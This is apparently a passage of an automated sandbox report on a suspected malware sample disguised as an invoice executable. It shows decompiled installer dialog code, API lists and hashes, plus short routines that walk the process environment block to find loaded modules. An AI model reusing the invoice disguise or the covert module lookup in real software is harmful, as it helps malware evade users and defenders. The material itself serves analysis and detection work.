				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057D4(0x3fb, _t146);
					E004063AF(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057D4(0x3fb, _t146);
							if(E00405B5A(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060D4(0x79e538, _t146);
							_t87 = E004064DD(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060D4(0x79e538, _t146);
								_t89 = E00405B05(0x79e538);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x79e538,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79e538) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79e538,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AB3(0x79e538);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x79e538) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404A7E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a273c + 0x10)) != _t158) {
									E00404A66(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x79e528);
									} else {
										E004049A1(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a3024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040417A(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x79f558 == _t158) {
									E00404543();
								}
								 *0x79f558 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x79f568;
							_v60 = E0040493B;
							_v56 = _t146;
							_v68 = E00406167(_t146, 0x79f568, _t166, 0x79e940, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A6C(_t146);
								_t125 =  *((intOrPtr*)( *0x7a2f74 + 0x11c));
								if( *((intOrPtr*)( *0x7a2f74 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00406167(_t146, 0x79f568, _t166, 0, _t125);
									if(lstrcmpiA(0x7a1f00, 0x79f568) != 0) {
										lstrcatA(_t146, 0x7a1f00);
									}
								}
								 *0x79f558 =  *0x79f558 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AD9(_t146) != 0 && E00405B05(_t146) == 0) {
						E00405A6C(_t146);
					}
					 *0x7a2738 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404158(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404158(_t166);
					E0040418D(_t165);
					_t138 = E004064DD(8);
					if(_t138 == 0) {
						L53:
						return E004041BF(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x004045ea
0x004045f0
0x004045f6
0x00404603
0x00404611
0x00404614
0x0040461c
0x00404622
0x00404622
0x0040462e
0x00404631
0x0040469f
0x004046a6
0x0040477d
0x00404784
0x00404793
0x00404793
0x00404797
0x004047a1
0x004047ae
0x004047b0
0x004047b0
0x004047be
0x004047c5
0x004047cc
0x004047cf
0x00404806
0x00404808
0x0040480e
0x00404813
0x00404817
0x00404819
0x00404819
0x00404835
0x00000000
0x00404837
0x0040483a
0x00404848
0x0040484e
0x0040484f
0x00404852
0x00404855
0x00000000
0x00404855
0x004047d1
0x004047d3
0x004047d7
0x00000000
0x00000000
0x00000000
0x00000000
0x004047d9
0x004047d9
0x004047e6
0x004047eb
0x00000000
0x00000000
0x004047ef
0x004047f1
0x004047f1
0x004047f9
0x004047fb
0x004047fe
0x00404801
0x00404804
0x00000000
0x00000000
0x00000000
0x00000000
0x00404804
0x00404861
0x0040486b
0x0040486e
0x00404871
0x00404878
0x00404878
0x0040487a
0x0040487a
0x0040487f
0x00404881
0x00404889
0x00404890
0x00404892
0x0040489d
0x0040489d
0x00404892
0x004048ad
0x004048b7
0x004048bf
0x004048da
0x004048c1
0x004048ca
0x004048ca
0x004048bf
0x004048df
0x004048e4
0x004048e9
0x004048f2
0x004048f2
0x004048fb
0x004048fd
0x004048fd
0x00404909
0x00404911
0x0040491b
0x0040491b
0x00404920
0x00000000
0x00404920
0x004047cf
0x00404786
0x0040478d
0x00000000
0x00000000
0x00000000
0x0040478d
0x004046ac
0x004046b5
0x004046cf
0x004046d4
0x004046de
0x004046e5
0x004046f1
0x004046f4
0x004046f7
0x004046fe
0x00404706
0x00404709
0x0040470d
0x00404714
0x0040471c
0x00404776
0x0040471e
0x0040471f
0x00404726
0x00404730
0x00404738
0x00404745
0x00404759
0x0040475d
0x0040475d
0x00404759
0x00404762
0x0040476f
0x0040476f
0x0040471c
0x00000000
0x004046d4
0x004046c2
0x00000000
0x00000000
0x004046c8
0x00000000
0x00404633
0x00404640
0x00404649
0x00404656
0x00404656
0x0040465d
0x00404663
0x0040466c
0x0040466f
0x00404672
0x0040467a
0x0040467d
0x00404680
0x00404686
0x0040468d
0x00404694
0x00404926
0x00404938
0x0040469a
0x0040469d
0x00000000
0x0040469d
0x00404694

APIs

GetDlgItem.USER32 ref: 00404639
SetWindowTextA.USER32(00000000,?), ref: 00404663
SHBrowseForFolderA.SHELL32(?,0079E940,?), ref: 00404714
CoTaskMemFree.OLE32(00000000), ref: 0040471F
lstrcmpiA.KERNEL32(007A1F00,0079F568,00000000,?,?), ref: 00404751
lstrcatA.KERNEL32(?,007A1F00), ref: 0040475D
SetDlgItemTextA.USER32 ref: 0040476F

Part of subcall function 004057D4: GetDlgItemTextA.USER32 ref: 004057E7

Part of subcall function 004063AF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
Part of subcall function 004063AF: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
Part of subcall function 004063AF: CharNextA.USER32(?,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
Part of subcall function 004063AF: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429

GetDiskFreeSpaceA.KERNEL32(0079E538,?,?,0000040F,?,0079E538,0079E538,?,00000001,0079E538,?,?,000003FB,?), ref: 0040482D
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404848

Part of subcall function 004049A1: lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
Part of subcall function 004049A1: wsprintfA.USER32 ref: 00404A47
Part of subcall function 004049A1: SetDlgItemTextA.USER32 ref: 00404A5A

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040473A
A, xrefs: 0040470D
8y, xrefs: 004047B7

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: 8y$A$C:\Users\user\AppData\Local\Temp
API String ID: 2624150263-1129824994
Opcode ID: 0a6a5836e72cd0f58b1e28fdcfe34536ea1e5235d75c7b8d63da3860149ea9d6
Instruction ID: 0969ed353920fe7c0c653b0854d10b45f8508fdea16f9d8b9f06e94c3a270cc6
Opcode Fuzzy Hash: 0a6a5836e72cd0f58b1e28fdcfe34536ea1e5235d75c7b8d63da3860149ea9d6
Instruction Fuzzy Hash: 80A17FB1900208ABDB11EFA5CD85AAF77B8EF85314F14843BF701B62D1D77C8A518B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AD9( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-47812868
Opcode ID: 572093ae0d751e8230f045d8d4f6330028a69c325cdf9423a5658a9fff3cb600
Instruction ID: 66478de832771c1020eecb70c9dea3013e0956f30c68bb444eb5f27a96bb8e2b
Opcode Fuzzy Hash: 572093ae0d751e8230f045d8d4f6330028a69c325cdf9423a5658a9fff3cb600
Instruction Fuzzy Hash: DC511671A00208AFCB00DFE4C988E9D7BB6FF48314F2041BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406032(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060D4();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3bf1a89c80ad1d8c5a393b8e38b86fcab810b7cb19905690dcf63459e08d4705
Instruction ID: 501d16c749f80da14ed264ffe4d7962c3458ff385ba500142fb475b890c78c7d
Opcode Fuzzy Hash: 3bf1a89c80ad1d8c5a393b8e38b86fcab810b7cb19905690dcf63459e08d4705
Instruction Fuzzy Hash: E5F0A771644110DED700EB649A49AEE77689F51314F20457BF102B20C1D6B84A46972A

Uniqueness

Uniqueness Score: -1.00%

Function 10003111, Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f17ad71054ba678d43fc7f0a4d3368501d09ac178e4c7c9a1dd376d2a7e0ad
Instruction ID: 891e36009322be4ddfff447bcc52fc9a5ff5e6554fd3030a9fa494257b31c10f
Opcode Fuzzy Hash: e7f17ad71054ba678d43fc7f0a4d3368501d09ac178e4c7c9a1dd376d2a7e0ad
Instruction Fuzzy Hash: 1702F474E40209EFEB12CF94CD85BAEBBB9FF04345F208065E511BA2A5D775AA84DF10

Uniqueness

Uniqueness Score: -1.00%

Function 1000410A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000410A(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E10004050(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}

0x10004116
0x1000411f
0x10004128
0x10004131
0x10004134
0x10004153
0x1000415c
0x00000000
0x00000000
0x00000000
0x1000415e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77034a0eb51728653df0163b62c09d4888ed229230f4a7f31d85ed3de07642d0
Instruction ID: 229480e46f0095c7e49db6cb485d2af95b302c99c88f1e6de21a9696ffc8e844
Opcode Fuzzy Hash: 77034a0eb51728653df0163b62c09d4888ed229230f4a7f31d85ed3de07642d0
Instruction Fuzzy Hash: 49010D78A11209EFDB41DF98C58099DBBF5FB18750F128495E914E7315D730EE40DB44

Uniqueness

Uniqueness Score: -1.00%

Function 10003F0F, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003F0F() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x10003f26

Memory Dump Source

Source File: 00000000.00000002.688785234.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.688758072.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688771006.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.688778149.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00404B5D, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404B5D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x7a2fa8;
				_v28 =  *0x7a2f74 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x7a2f7d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404AAB(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x7a2f7c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x79f54c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x79f560;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x79f54c = 0;
								 *0x79f560 = 0;
								 *0x7a2fe0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a2f7d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B2B();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x79f560;
									_t206 =  *0x7a2fa8;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a2fac <= 0) {
										L86:
										if( *0x7a2f6c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a273c + 0x10)) != 0) {
											E00404A66(0x3ff, 0xfffffffb, E00404A7E(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
